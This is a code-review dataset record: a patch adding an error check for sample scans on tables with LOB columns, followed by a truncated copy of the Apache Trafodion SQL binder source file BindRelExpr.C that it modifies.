patch
stringlengths
17
31.2k
y
int64
1
1
oldf
stringlengths
0
2.21M
idx
int64
1
1
id
int64
4.29k
68.4k
msg
stringlengths
8
843
proj
stringclasses
212 values
lang
stringclasses
9 values
@@ -7469,7 +7469,14 @@ RelExpr *Scan::bindNode(BindWA *bindWA) bindWA->setErrStatus(); return NULL; } - + if (naTable->hasLobColumn() && isSampleScan()) + { + *CmpCommon::diags() << DgSqlCode(-4322) + << DgTableName( + naTable->getTableName().getQualifiedNameAsAnsiString()); + bindWA->setErrStatus(); + return NULL; + } // restricted partitions for HBase table if (naTable->isHbaseTable() && (naTable->isPartitionNameSpecified() ||
1
/********************************************************************** // @@@ START COPYRIGHT @@@ // // Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. // // @@@ END COPYRIGHT @@@ **********************************************************************/ /* -*-C++-*- ****************************************************************************** * * File: BindRelExpr.C * Description: Relational expressions (both physical and logical operators) * Methods related to the SQL binder * * Created: 5/17/94 * Language: C++ * * * * It is the secret sympathy, * The silver link, the silken tie, * Which heart to heart, and mind to mind, * In body and in soul can bind. * -- Sir Walter Scott, * "The Lay of the Last Minstrel" * ****************************************************************************** */ #define SQLPARSERGLOBALS_FLAGS // must precede all #include's #define SQLPARSERGLOBALS_NADEFAULTS #include "Platform.h" #include "NAWinNT.h" #include "Sqlcomp.h" #include "AllItemExpr.h" #include "AllRelExpr.h" #include "BindWA.h" #include "ComOperators.h" #include "ComTransInfo.h" #include "ComLocationNames.h" #include "ControlDB.h" #include "Debug.h" #include "ex_error.h" #include "GroupAttr.h" #include "ParNameLocList.h" #include "parser.h" #include "Rel3GL.h" #include "RelDCL.h" #include "RelPackedRows.h" #include "RelSequence.h" #include "ShowSchema.h" // GetControlDefaults class #include "StmtDDLAddConstraintCheck.h" #include "StmtDDLCreateView.h" #include "ElemDDLColRefArray.h" #include "ElemDDLSaltOptions.h" #include "desc.h" #include "UdrErrors.h" #include "SequenceGeneratorAttributes.h" #include "wstr.h" #include "Inlining.h" #include "Triggers.h" #include "TriggerDB.h" #include "MVInfo.h" #include "Refresh.h" #include "ChangesTable.h" #include "MvRefreshBuilder.h" #include "OptHints.h" #include "CmpStatement.h" #include "OptimizerSimulator.h" #include "charinfo.h" #include "UdfDllInteraction.h" #include "SqlParserGlobals.h" // must be last #include #include "ItmFlowControlFunction.h" #include "ComSchemaName.h" // for ComSchemaName #include "ItemSample.h" #include "NAExecTrans.h" #include "HDFSHook.h" #include "CmpSeabaseDDL.h" #include "ComUser.h" #include "ComSqlId.h" #include "PrivMgrCommands.h" #include "PrivMgrComponentPrivileges.h" #include "PrivMgrDefs.h" #include "PrivMgrMD.h" #define SLASH_C '/' NAWchar *SQLTEXTW(); // ----------------------------------------------------------------------- // external declarations // ----------------------------------------------------------------------- // // ----------------------------------------------------------------------- // static functions // ----------------------------------------------------------------------- #ifdef NDEBUG THREAD_P NABoolean GU_DEBUG = FALSE; #else THREAD_P NABoolean GU_DEBUG; #endif static void GU_DEBUG_Display(BindWA *bindWA, GenericUpdate *gu, const char *text, RelExpr *reDown = NULL, NABoolean preEndl = FALSE, NABoolean postEndl = FALSE) { #ifndef NDEBUG if (!GU_DEBUG) return; // LCOV_EXCL_START - dpm if (preEndl) cerr << endl; cerr << "---" << endl; if (gu->getTableDesc()) { NAString tmp; ValueIdList vtmp(gu->getTableDesc()->getColumnList()); vtmp.unparse(tmp); cerr << gu->getUpdTableNameText() << " this>td(" << text << ") " << gu->getTableDesc()->getCorrNameObj().getExposedNameAsAnsiString() << " " << tmp << endl; } RETDesc *rd = gu->getRETDesc(); if (rd) { cerr << gu->getUpdTableNameText() << " this>grd(" << text << ") " << flush; rd->display(); } if (reDown) RETDesc::displayDown(reDown); if (bindWA->getCurrentScope()->getRETDesc() && bindWA->getCurrentScope()->getRETDesc() != rd) { cerr << gu->getUpdTableNameText() << " bwa>cs>grd(" << text << ") " <<flush; bindWA->getCurrentScope()->getRETDesc()->display(); } // LCOV_EXCL_STOP if (postEndl) cerr << endl; #endif } // GU_DEBUG_Display() #pragma nowarn(770) // warning elimination static RETDesc *bindRowValues(BindWA *bindWA, ItemExpr *exprTree, ValueIdList &vidList, RelExpr *parent, NABoolean inTrueRoot) { // Before we convert the row value expressions into a ValueIdList, save the // original value expression root nodes in an ItemExprList. // ItemExprList exprList(exprTree, bindWA->wHeap()); // // Bind the row value expressions and create a ValueIdList. // exprTree->convertToValueIdList(vidList, bindWA, ITM_ITEM_LIST, parent); if (bindWA->errStatus()) return NULL; // Set up context flags. // We are in a subquery if the previous scope's flag is set, note. // BindScope *currScope = bindWA->getCurrentScope(); BindScope *prevScope = bindWA->getPreviousScope(currScope); NABoolean inSelectList = currScope->context()->inSelectList(); NABoolean inInsert = currScope->context()->inInsert(); NABoolean inSubquery = FALSE; if (prevScope) inSubquery = prevScope->context()->inSubquery(); // See if UDF_SUBQ_IN_AGGS_AND_GBYS is enabled. It is enabled if the // default is ON, or if the default is SYSTEM and ALLOW_UDF is ON. NABoolean udfSubqInAggGrby_Enabled = FALSE; DefaultToken udfSubqTok = CmpCommon::getDefault(UDF_SUBQ_IN_AGGS_AND_GBYS); if ((udfSubqTok == DF_ON) || (udfSubqTok == DF_SYSTEM)) udfSubqInAggGrby_Enabled = TRUE; // See if ALLOW_MULTIDEGREE_SUBQ_IN_SELECTLIST is enabled. It is // enabled if the default is ON, or if the default is SYSTEM and // ALLOW_UDF is ON. NABoolean allowMultiDegSubqInSelect_Enabled = FALSE; DefaultToken allowMultiDegreeTok = CmpCommon::getDefault(ALLOW_MULTIDEGREE_SUBQ_IN_SELECTLIST); if ((allowMultiDegreeTok == DF_ON) || (allowMultiDegreeTok == DF_SYSTEM)) allowMultiDegSubqInSelect_Enabled = TRUE; // // Create the result table. // If a row value expression is not a column reference and does not have // a rename AS clause, the column is an unnamed expression. // RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); CollIndex j = 0; for (CollIndex i = 0; i < exprList.entries(); i++, j++) { ItemExpr *itemExpr = (ItemExpr *) exprList[i]; ValueId valId = itemExpr->getValueId(); ValueId boundValId = vidList[j]; CMPASSERT(boundValId != NULL_VALUE_ID); if (inSelectList && inTrueRoot && (boundValId.getType().getTypeQualifier() == NA_UNKNOWN_TYPE)&& (boundValId.getItemExpr()->getOperatorType() == ITM_CONSTANT)) { ConstValue * constItemExpr = (ConstValue*) boundValId.getItemExpr(); if (constItemExpr->isNull()) boundValId.coerceType(NA_NUMERIC_TYPE) ; } switch (itemExpr->getOperatorType()) { case ITM_REFERENCE: { ColReference *colRef = (ColReference *) itemExpr; const ColRefName &colRefName = colRef->getColRefNameObj(); CMPASSERT(valId != NULL_VALUE_ID || colRefName.isStar()); if (colRefName.isStar()) { const ColumnDescList *star = colRef->getStarExpansion(); CMPASSERT(star != NULL); const ColumnDescList &starExpansion = *star; CMPASSERT(starExpansion.entries() > 0); // ColRef::bind chked this alrdy CMPASSERT(inSelectList); resultTable->addColumns(bindWA, starExpansion); j += starExpansion.entries() - 1; } // isStar else { // Do another xcnm lookup so the column we add to our resultTable // will have its CorrName object correct // (e.g., in "SELECT TL.B,* FROM TA TL,TA TR ORDER BY B;" // colref TL.B will resolve to TL.B, not CAT.SCH.TL.B) // and its heading (Genesis 10-980126-5495). BindScope *bindScope; ColumnNameMap *xcnmEntry = bindWA->findColumn(colRefName, bindScope); if (NOT xcnmEntry) // ## I don't recall when this case occurs... resultTable->addColumn(bindWA, colRefName, boundValId, colRef->getTargetColumnClass()); else resultTable->addColumn(bindWA, xcnmEntry->getColRefNameObj(), boundValId, colRef->getTargetColumnClass(), // MV -- xcnmEntry->getColumnDesc()->getHeading()); } break; } case ITM_RENAME_COL: { RenameCol *renameCol = (RenameCol *) itemExpr; const ColRefName &colRefName = *renameCol->getNewColRefName(); CMPASSERT(NOT colRefName.isStar()); const char * heading = NULL; // if this rename was for a BLOB/CLOB column from JDBC, return // the heading of the child base column. This is needed for JDBC // as it uses the heading to figure out if the column is a LOB // column. if (CmpCommon::getDefault(JDBC_PROCESS) == DF_ON) { ItemExpr * childExpr = itemExpr->child(0)->castToItemExpr(); if (childExpr->getOperatorType() == ITM_BASECOLUMN) { heading = ((BaseColumn *)childExpr)->getNAColumn()->getHeading(); if (heading) { if ((strcmp(heading, "JDBC_BLOB_COLUMN -") != 0) && (strcmp(heading, "JDBC_CLOB_COLUMN -") != 0)) heading = NULL; } } } // No heading is passed here (whole point of SQL derived-column is rename) // unless it is a jdbc blob/clob heading. resultTable->addColumn(bindWA, colRefName, boundValId, renameCol->getTargetColumnClass(), heading); break; } case ITM_ROW_SUBQUERY: case ITM_USER_DEF_FUNCTION: { // Deal with multi Valued User Defined Functions or Subqueries with // degree > 1. // // In order to have the correct degree during the bind phase, // since we don't have all the information until after the transform // phase, we need to put entries into the RETDesc early. // // Say you have a query like this: // select mvf(a,b) from t1; // and assume mvf outputs 2 values. // // at bind time, the select list will only have 1 entry in it, namely // the ITM_USER_DEF_FUNCTION. // Since we do degree checking at bind time, we need to know now that // mvf() actually produces 2 values. // // So what we do here, is that we substitute the original // ITM_USER_DEF_FUNCTION with ValueIdProxies. One for each output of // the original function. The selectList of the RelRoot as well as the // retDESC are updated with the additional elements. // // Similarly if we have a subquery like this: // // select (select max(a),max(b) from t2), a from t1; // // we will wrap the subquery in a ValeIdProxy representing the // subquery from a transformation point of view, but representing // max(a) from an output point of view. A second ValueIdProxy will be // added for max(b), so the select list of the outer query would look // like this: // // [ ValueIdProxy(Subq:max(a)), ValueIdProxy(Subq:max(b)), a ] // // instead of just // // [ Subq, a ] // // like we are used to. // // At transform time the valueIdProxies, will disappear and we will // transform the UDF/Subquery carried inside the valueIdProxy // marked to be transformed. Some might hang around until Normalization. // Only the ValueIdProxy representing the first output will be marked // to be transformed, so we only transform the UDF/Subquery once. // // Similarly, we update the outer query's retDESC. NABoolean isSubquery = (itemExpr->getOperatorType() == ITM_ROW_SUBQUERY) ? TRUE : FALSE; NAColumnArray outCols; ValueIdList outColVids; CollIndex currIndex = j; if (isSubquery) { Subquery * subq = (Subquery *) itemExpr; const RETDesc *retDesc = subq->getSubquery()->getRETDesc(); if( retDesc ) { retDesc->getColumnList()->getValueIdList(outColVids); } } else { UDFunction * udf = (UDFunction *) itemExpr; CMPASSERT(udf->getRoutineDesc()); const RoutineDesc *rDesc = udf->getRoutineDesc(); // Get the outputs of this UDF, these are as defined in metadata // including names etc. outCols = rDesc->getEffectiveNARoutine()->getOutParams(); outColVids = rDesc->getOutputColumnList(); } if ( (outColVids.entries() == 1) || ( isSubquery && (!allowMultiDegSubqInSelect_Enabled) )) { // Do exactly what we used to do if the degree is 1. // or we have disallowed subqueries of degree > 1. if (isSubquery) { // ## Here we ought to manufacture a unique name per Ansi 7.9 SR 9c. ColRefName colRefName; resultTable->addColumn(bindWA, colRefName, boundValId); } else { NAColumn *col = outCols[0]; const char * heading = col->getHeading(); ColRefName colRefName( col->getColName()); ColumnClass colClass( col->getColumnClass()); resultTable->addColumn(bindWA, colRefName, boundValId, colClass, heading); } break; } // Wrap all the outputs with a ValueIdProxy // so that we can deal with multiple outputs // If we didn't have a RETDesc or a RoutineDesc, outColVids // will be empty and we don't do anything. // Also we do not need to worry about recursing through the // RETDesc entries as the call to convertToValueIdList() above // did that already. for (CollIndex idx = 0; idx < outColVids.entries(); idx++) { NAColumn *col; NABoolean isRealOrRenameColumn = (outColVids[idx].getItemExpr()->getOperatorType() == ITM_BASECOLUMN) || (outColVids[idx].getItemExpr()->getOperatorType() == ITM_RENAME_COL) || !isSubquery ? TRUE : FALSE; if (isSubquery) { col = ((NAColumn *) outColVids[idx].getItemExpr()); } else { col = ((NAColumn *) outCols[idx]); } const char * heading = isRealOrRenameColumn ? col->getHeading() : ""; ColRefName colRefName( isRealOrRenameColumn ? col->getColName() : ""); ColumnClass colClass( isRealOrRenameColumn ? col->getColumnClass() : USER_COLUMN); // We are wrapping the MVF/Subquery and its additional outputs // with a ValueIdProxy. This way we don't end up flattening or // expanding the outputs of the MVF multiple times. // The valueId of the RoutineParam corresponding to the // metadata column is used for the output valueId. // So if you had a query like this: // // select swap2(a,b) from t1; // // and swap2() returns 2 outputs (basically the inputs swapped) // // The new select list for the query would be: // // 1: ValueIdProxy with the derivedNode being swap2, and output // valueId containing the first output parameter of swap2. // Also the transformDerivedFrom flag would be set // 2: ValueIdProxy with the derivedNode being swap2, and output // valueId containing the second output parameter of swap2. // // These ValueIdProxy nodes will go away at transform time.. ValueIdProxy *proxyOutput = new (CmpCommon::statementHeap()) ValueIdProxy( boundValId, outColVids[idx], idx); // The type of the proxy is the same as the output valueId associated // with it. proxyOutput = (ValueIdProxy *) proxyOutput->bindNode(bindWA); if (bindWA->errStatus()) return NULL; // Make sure we transform the MVF if (idx == 0) proxyOutput->setTransformChild(TRUE); if (!isSubquery || isRealOrRenameColumn) { resultTable->addColumn(bindWA, colRefName, proxyOutput->getValueId(), colClass, heading); } else { resultTable->addColumn(bindWA, colRefName, proxyOutput->getValueId()); } if (idx == 0) { vidList.removeAt(currIndex); // we need to delete the old valueId } else j++; // The first entry simply replaces the original // Update the list with the new value. // insertAt has the nice feature that it will push // the residual elements to the right, so we do not need to // manage the valueIds we haven't processed yet as long as we // update the index (j++ above) correctly. vidList.insertAt(currIndex++,proxyOutput->getValueId()); } break; } default: { // ## Here we ought to manufacture a unique name per Ansi 7.9 SR 9c. ColRefName colRefName; resultTable->addColumn(bindWA, colRefName, boundValId); break; } } // switch } // for // need this for static cursor declaration cmpCurrentContext->saveRetrievedCols_ = resultTable->getDegree(); // Before we can return the result table, we need to check for the possible // syntax error below, in which we can't use the definition of "inSubquery" // that we calculate above. Our example case is, if we're directly below // a GroupByAgg, then we need to look at the scope *before* the GroupByAgg // to determine if we satisfy the error condition below. This is a problem // with how our plan trees don't sync completely with SQL syntax. // Here's the error case (Genesis 10-980518-0765): // // >> select (select distinct 1,2 from T1 t) from T1; // // First of all, yes, it's a really stupid query. Oh well! :-) // // It's pretty clear that the "1,2" is part of a "select list inside the // subquery of a select list." However, the parser creates a GroupByAgg // for the distinct keyword (sigh), which means that we have an // additional scope between the scope of the SQLRecord (1,2) and the // scope of the "TRUE" parent, the inner-select. This additional scope // is for the GroupByAgg. So in the case of a GroupByAgg (and possibly // another case will arise later ...?), we need to look at the // GroupByAgg's parent to determine if we satisfy this error condition. // // To recap: To handle this one (stupid) case we've added a ton of // comments and code here and in GroupByAgg::bindNode(), plus created // the new functions/members BindWA::getSubqueryScope(), and // BindContext::lookAboveToDecideSubquery_/(). Wonderful! // if (prevScope) { BindScope *subQScope = bindWA->getSubqueryScope(currScope); // // subQScope should be non-NULL when prevScope is non-NULL // CMPASSERT(subQScope); NABoolean inSubqueryInSelectList = subQScope->context()->inSubquery() && subQScope->context()->inSelectList(); NABoolean inSubqueryInGroupByClause = subQScope->context()->inSubquery() && subQScope->context()->inGroupByClause() && (CmpCommon::getDefault(UDF_SUBQ_IN_AGGS_AND_GBYS) == DF_ON); //10-060602-6930 Begin //Added a check to not enter this condition when we are in bindView scope if (inSelectList && (inSubqueryInSelectList || inSubqueryInGroupByClause) && !bindWA->inViewExpansion()) { //10-060602-6930 End // We now can check for the syntax error that we've done so much work // above (and in GroupByAgg::bindNode(), BindWA.h & BindWA.cpp) // to detect: if ((j > 1) && (!allowMultiDegSubqInSelect_Enabled) ) { // 4019 The select list of a subquery in a select list must be scalar *CmpCommon::diags() << DgSqlCode(-4019); bindWA->setErrStatus(); return NULL; } } } // prevScope return resultTable; } // bindRowValues() #pragma warn(770) // warning elimination // Bind a constraint (MP Check Constraint). // Returns NULL if error in constraint *OR* we can safely ignore the constraint // (e.g., a NOT NULL NONDROPPABLE constraint); caller must check bindWA errsts. // static ItemExpr* bindCheckConstraint( BindWA *bindWA, CheckConstraint *constraint, const NATable *naTable, NABoolean catmanCollectUsages = FALSE, ItemExpr *viewCheckPred = NULL) { ItemExpr *constraintPred = NULL; if (viewCheckPred) { // view WITH CHECK OPTION: the view's where-clause was already parsed // in bindView CMPASSERT(constraint->getConstraintText().isNull()); // sanity check constraintPred = viewCheckPred; } else { Parser parser(bindWA->currentCmpContext()); constraintPred = parser.getItemExprTree(constraint->getConstraintText().data(), constraint->getConstraintText().length(), CharInfo::UTF8 // ComGetNameInterfaceCharSet() ); } if (constraintPred) { ParNameLocList *saveNameLocList = bindWA->getNameLocListPtr(); if (!catmanCollectUsages || !bindWA->getUsageParseNodePtr() || bindWA->getUsageParseNodePtr()->getOperatorType() == DDL_CREATE_VIEW) bindWA->setNameLocListPtr(NULL); CMPASSERT(!bindWA->getCurrentScope()->context()->inCheckConstraint()); bindWA->getCurrentScope()->context()->inCheckConstraint() = constraint; constraintPred->bindNode(bindWA); bindWA->setNameLocListPtr(saveNameLocList); bindWA->getCurrentScope()->context()->inCheckConstraint() = NULL; if (bindWA->errStatus()) { delete constraintPred; constraintPred = NULL; } } // A NOT NULL constraint on a single column which never allows nulls // (has no null indicator bytes) // -- i.e., the common case of a column declared NOT NULL NONDROPPABLE -- // does not need to be separately enforced as a constraint, because // Executor will raise a numeric-overflow error if someone tries to // put a NULL into such a column. // // So we don't need to put this constraint into the list, but we do need // to save its name, for run-time error diags. // // ##To be done: // ## GenRelUpdate DP2Insert/Update: for each col in newRecExpr(), // ## if getNotNullViolationCode(), then // ## save the SqlCode and the getNotNullConstraintName()...asAnsiString() // ## and some column identifier (pos or offset) in some per-query struct // ## Executor: if error 8411, if truly a NULL violation, look up that column // ## in the nnconstraint struct and populate diags with the info there. // if (constraintPred) { ItemExprList nncols(bindWA->wHeap()); constraintPred->getColumnsIfThisIsISNOTNULL(nncols); for (CollIndex i = 0; i < nncols.entries(); i++) { NAColumn *nacol = nncols[i]->getValueId().getNAColumn(); if (!nacol->getType()->supportsSQLnullPhysical()) { nacol->setNotNullNondroppable(constraint); // // DO *NOT* do: delete constraintPred; // -- it deletes a whole tree of stuff referenced elsewhere! // constraintPred = NULL; } else { // Leaving the column's type's supportsSQLnullPhysical() as is (TRUE), // set its supportsSQLnullLogical() to FALSE, // for the Transform phase. nacol->mutateType()->setNullable(TRUE/*supports physical nulls*/, FALSE/*but not logical nulls */); } } } else { *CmpCommon::diags() << DgSqlCode(-4025) << DgConstraintName(ToAnsiIdentifier(constraint->getConstraintName().getObjectName())) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); } return constraintPred; } // bindCheckConstraint() // LCOV_EXCL_START - cnu static ItemExpr *intersectColumns(const RETDesc &leftTable, const RETDesc &rightTable, BindWA* bindWA) { ItemExpr *predicate = NULL; for (CollIndex i = 0; i < leftTable.getDegree(); i++) { ItemExpr *leftExpr = leftTable.getValueId(i).getItemExpr(); ItemExpr *rightExpr = rightTable.getValueId(i).getItemExpr(); BiRelat *compare = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, leftExpr, rightExpr); if (predicate) predicate = new (bindWA->wHeap()) BiLogic(ITM_AND, predicate, compare); else predicate = compare; } // Binding this predicate must be done in caller's context/scope, not here... return predicate; } // intersectColumns() // LCOV_EXCL_STOP static ItemExpr *joinCommonColumns(const RelExpr *const leftRelExpr, const RelExpr *const rightRelExpr, BindWA* bindWA) { const RETDesc &leftTable = *leftRelExpr->getRETDesc(); const RETDesc &rightTable = *rightRelExpr->getRETDesc(); // // Find the common column names between two tables and create a predicate // that joins the columns. For example, if tables T1 and T2 have common // column names A and B, return the predicate T1.A = T2.A AND T1.B = T2.B. // The checking for ambiguous common columns will be done when they are // are coalesced for the output list. // ItemExpr *predicate = NULL; for (CollIndex i = 0; i < leftTable.getDegree(); i++) { ColRefName simpleColRefName(leftTable.getColRefNameObj(i).getColName()); // if (NOT simpleColRefName.isEmpty()) { // ColumnNameMap *commonCol = rightTable.findColumn(simpleColRefName); // if (commonCol) { // ItemExpr *leftExpr = leftTable.getValueId(i).getItemExpr(); ItemExpr *rightExpr = commonCol->getValueId().getItemExpr(); // bindWA->markAsReferencedColumn(leftExpr); bindWA->markAsReferencedColumn(rightExpr); BiRelat *compare = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, leftExpr, rightExpr); if (predicate) predicate = new(bindWA->wHeap()) BiLogic(ITM_AND, predicate, compare); else predicate = compare; } } } // Binding this predicate is being done in caller, Join::bindNode() return predicate; } // joinCommonColumns() // Functions findNonCommonColumns() and coalesceCommonColumns() // // These create the column descriptors for the result of a natural join. // A natural join is equivalent to // // SELECT SLCC, SLT1, SLT2 FROM T1, T2 // // where SLCC represents the list of coalesced common columns of T1 and T2, // SLT1 represents the list of non-common columns of T1, and // SLT2 represents the list of non-common columns of T2. // // A coalesced common column C is equivalent to // // COALESCE (T1.C, T2.C) AS C -- i.e. there is no table name; CorrName is "" // // where COALESCE (T1.C, T2.C) is equivalent to // // CASE WHEN T1.C IS NOT NULL THEN T1.C ELSE T2.C END // // Function findNonCommonColumns(), on the first call, coalesces common // columns into the resultTable, and collects non-common columns. // On the second call it continues to collect non-common columns. // // Function coalesceCommonColumns() adds SLCC, SLT1, SLT2 to the // resultTable in the proper order. // static void findNonCommonColumns(BindWA *bindWA, OperatorTypeEnum joinType, const RETDesc &sourceTable, const RETDesc &targetTable, RETDesc &resultTable, ColumnDescList &nonCommonCols) { // Used for ANSI 6.4 SR 3aii below. CorrName implemDependCorr(bindWA->fabricateUniqueName(), TRUE); // for (CollIndex i = 0; i < sourceTable.getDegree(); i++) { const ColRefName &sourceColRefName = sourceTable.getColRefNameObj(i); ValueId sourceId = sourceTable.getValueId(i); ColRefName simpleColRefName(sourceColRefName.getColName()); // // If a column is an unnamed expression, it is a non-common column. // if (simpleColRefName.isEmpty()) nonCommonCols.insert(new (bindWA->wHeap()) ColumnDesc(sourceColRefName, sourceId, NULL, bindWA->wHeap())); else { ColumnNameMap *commonCol = targetTable.findColumn(simpleColRefName); // // If the named column does not have a corresponding column in the // target table, it is a non-common column. // if (NOT commonCol) nonCommonCols.insert(new (bindWA->wHeap()) ColumnDesc(sourceColRefName, sourceId, NULL, bindWA->wHeap())); // // If the target table has more than one corresponding column, error. // else if (commonCol->isDuplicate()) { NAString fmtdList(bindWA->wHeap()); LIST(TableNameMap*) xtnmList(bindWA->wHeap()); targetTable.getTableList(xtnmList, &fmtdList); // Tables in the RETDesc *CmpCommon::diags() << DgSqlCode(-4004) << DgColumnName(simpleColRefName.getColName()) << DgTableName(commonCol->getColRefNameObj().getCorrNameObj(). getExposedNameAsAnsiString()) << DgString0(fmtdList) << DgString1(bindWA->getDefaultSchema().getSchemaNameAsAnsiString()); bindWA->setErrStatus(); return; } else if (joinType != ITM_NO_OP) { // // Coalesce the common columns and add them to the result table. // ValueId resultId; switch(joinType) { case REL_JOIN: case REL_LEFT_JOIN: resultId = sourceId; break; case REL_RIGHT_JOIN: resultId = commonCol->getValueId(); break; default: { ItemExpr *sourceExpr = sourceId.getItemExpr(); ItemExpr *targetExpr = commonCol->getValueId().getItemExpr(); UnLogic *test = new (bindWA->wHeap()) UnLogic(ITM_IS_NULL, sourceExpr); ItemExpr *coalesce = new (bindWA->wHeap()) Case(NULL, new (bindWA->wHeap()) IfThenElse(test, targetExpr, sourceExpr)); coalesce = coalesce->bindNode(bindWA)->castToItemExpr(); if (bindWA->errStatus()) { delete test; delete coalesce; return; } resultId = coalesce->getValueId(); break; } // default case (braces required since vars are initialized here) } // switch // // ANSI 6.4 SR 3aii: // We've fabricated a unique implementation-dependent CorrName // outside the loop; the common columns have this basically // invisible CorrName, the point of which seems to be that // select * from // ta natural join tb // join -- not natural! // (ta tx natural join tb ty) // on 1=1; // should not generate an ambiguous column reference error // from the star-expansion. So according to ANSI, // the two natural joins produce, respectively, // fab1.slcc, ta.slt1, tb.slt2 // fab2.slcc, tx.slt1, ty.slt2 // so the join produces // fab1.slcc, ta.slt1, tb.slt2, fab2.slcc, tx.slt1, ty.slt2 // i.e. the two SLCC's are unambiguous. // ColRefName implemDepend(simpleColRefName.getColName(),implemDependCorr); resultTable.addColumn(bindWA, implemDepend, resultId); } // coalesce SLCC into resultTable } // named column } // for } // findNonCommonColumns() // Comments for this function can be found above the preceding function. static void coalesceCommonColumns(BindWA *bindWA, OperatorTypeEnum joinType, const RETDesc &leftTable, const RETDesc &rightTable, RETDesc &resultTable) { ColumnDescList nonCommonCols(bindWA->wHeap()); // non-common columns of the left table // // Coalesce the common column names of the left and right tables and add // them to the result table. // Collect the non-common column names from the left. // findNonCommonColumns(bindWA, joinType, leftTable, rightTable, resultTable, nonCommonCols); if (bindWA->errStatus()) return; // // Collect the non-common column names from the right. // RETDesc irrelevantOnThisCall; findNonCommonColumns(bindWA, ITM_NO_OP, // do not add SLCC to resultTable rightTable, leftTable, irrelevantOnThisCall, nonCommonCols); if (bindWA->errStatus()) return; // // Add the non-common columns from the left and right to the result table. // resultTable.addColumns(bindWA, nonCommonCols); nonCommonCols.clearAndDestroy(); // // Add the system columns from the left and right to the result table. // resultTable.addColumns(bindWA, *leftTable.getSystemColumnList(), SYSTEM_COLUMN); resultTable.addColumns(bindWA, *rightTable.getSystemColumnList(), SYSTEM_COLUMN); } // coalesceCommonColumns() // For Catalog Manager, this function: // 1) Fixes up the name location list to help with computing of the view text, // check constraint search condition text, etc. // 2) Collects the table (base table, view, etc.) usages information for // view definitions, check constraint definitions, etc. // // ** Some of this could be implemented, perhaps more simply, // ** using BindWA::viewCount() and BindWA::tableViewUsageList(). // static void BindUtil_CollectTableUsageInfo(BindWA *bindWA, const CorrName& corrName) { // Task (1) // ParNameLocList *pNameLocList = bindWA->getNameLocListPtr(); if (pNameLocList) { ParNameLoc * pNameLoc = pNameLocList->getNameLocPtr(corrName.getNamePosition()); if (pNameLoc) { if (NOT pNameLoc->getExpandedName(FALSE).isNull()) CMPASSERT(pNameLoc->getExpandedName() == corrName.getQualifiedNameObj().getQualifiedNameAsAnsiString()); pNameLoc->setExpandedName( corrName.getQualifiedNameObj().getQualifiedNameAsAnsiString()); } // // Task (2) // ExprNode *pUsageParseNode = bindWA->getUsageParseNodePtr(); if (pUsageParseNode) { if (pUsageParseNode->getOperatorType() == DDL_CREATE_VIEW) { StmtDDLCreateView &cvpn = *pUsageParseNode->castToElemDDLNode() ->castToStmtDDLCreateView(); ParTableUsageList &vtul = cvpn.getViewUsages().getViewTableUsageList(); vtul.insert(corrName.getExtendedQualNameObj()); } else if (pUsageParseNode->getOperatorType() == DDL_ALTER_TABLE_ADD_CONSTRAINT_CHECK) { StmtDDLAddConstraintCheck &node = *pUsageParseNode->castToElemDDLNode() ->castToStmtDDLAddConstraintCheck(); ParTableUsageList &tul = node.getTableUsageList(); tul.insert(corrName.getQualifiedNameObj()); } } } // if (pNameLocList) } // BindUtil_CollectTableUsageInfo() void castComputedColumnsToAnsiTypes(BindWA *bindWA, RETDesc *rd, ValueIdList &compExpr) { const ColumnDescList &cols = *rd->getColumnList(); CollIndex i = cols.entries(); CMPASSERT(i == compExpr.entries()); NAString tmp; // For a SELECT query that is part of a CREATE VIEW statement, force use of IEEE floating-point // because SQL/MX Catalog Manager does not support Tandem floating-point, and would return an // internal error if it is encountered. if (bindWA->inViewDefinition() || bindWA->inMVDefinition()) tmp = "IEEE"; else CmpCommon::getDefault(FLOATTYPE, tmp, -1); NABoolean outputFloattypeIEEE = ((tmp == "IEEE") || (CmpCommon::getDefault(ODBC_PROCESS) == DF_ON) || (CmpCommon::getDefault(JDBC_PROCESS) == DF_ON)); while (i--) { ColumnDesc *col = cols[i]; if (col->getValueId().getType().getTypeQualifier() == NA_ROWSET_TYPE) { return; } const NAType &naType = col->getValueId().getType(); // // Note: the unsupported and DATETIME cases are mutually exclusive with the LARGEDEC case below. // if (!naType.isSupportedType()) { // Unsupported types are displayed as strings of '#' to their display length ItemExpr *theRepeat = new (bindWA->wHeap()) Repeat(new (bindWA->wHeap()) SystemLiteral("#"), new (bindWA->wHeap()) SystemLiteral( naType.getDisplayLength( naType.getFSDatatype(), 0, naType.getPrecision(), naType.getScale(), 0))); theRepeat = theRepeat->bindNode(bindWA); col->setValueId(theRepeat->getValueId()); compExpr[i] = theRepeat->getValueId(); } else if ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) && (NOT bindWA->inViewDefinition()) && (NOT bindWA->inMVDefinition()) && (NOT bindWA->inCTAS()) && (naType.getTypeQualifier()== NA_DATETIME_TYPE && ((const DatetimeType &)naType).getSubtype() == DatetimeType::SUBTYPE_SQLDate) && (! CmpCommon::context()->getSqlmxRegress()) && (strcmp(ActiveSchemaDB()->getDefaults().getValue(OUTPUT_DATE_FORMAT), "ANSI") != 0)) { // Special1 DATE, return as YY/MM/DD ItemExpr * newChild = new (bindWA->wHeap()) Format(col->getValueId().getItemExpr(), "YY/MM/DD", FALSE); newChild = newChild->bindNode(bindWA); col->setValueId(newChild->getValueId()); compExpr[i] = newChild->getValueId(); } // For dynamic queries that are not part of a CREATE VIEW, change the returned type based on the // 'floattype' CQD. The default is Tandem type. // This is done to be upward compatible with // pre-R2 dynamic programs which are coded to expect tandem float // types in dynamic statements (describe, get descriptor, etc...). // The static statements are ok as we would convert from/to // tandem float hostvariables at runtime. // For the SELECT query that is part of a CREATE VIEW statement, do not convert to any // Tandem floating-point type because SQL/MX catalog manager does not support Tandem floating-point // and would give internal error. if 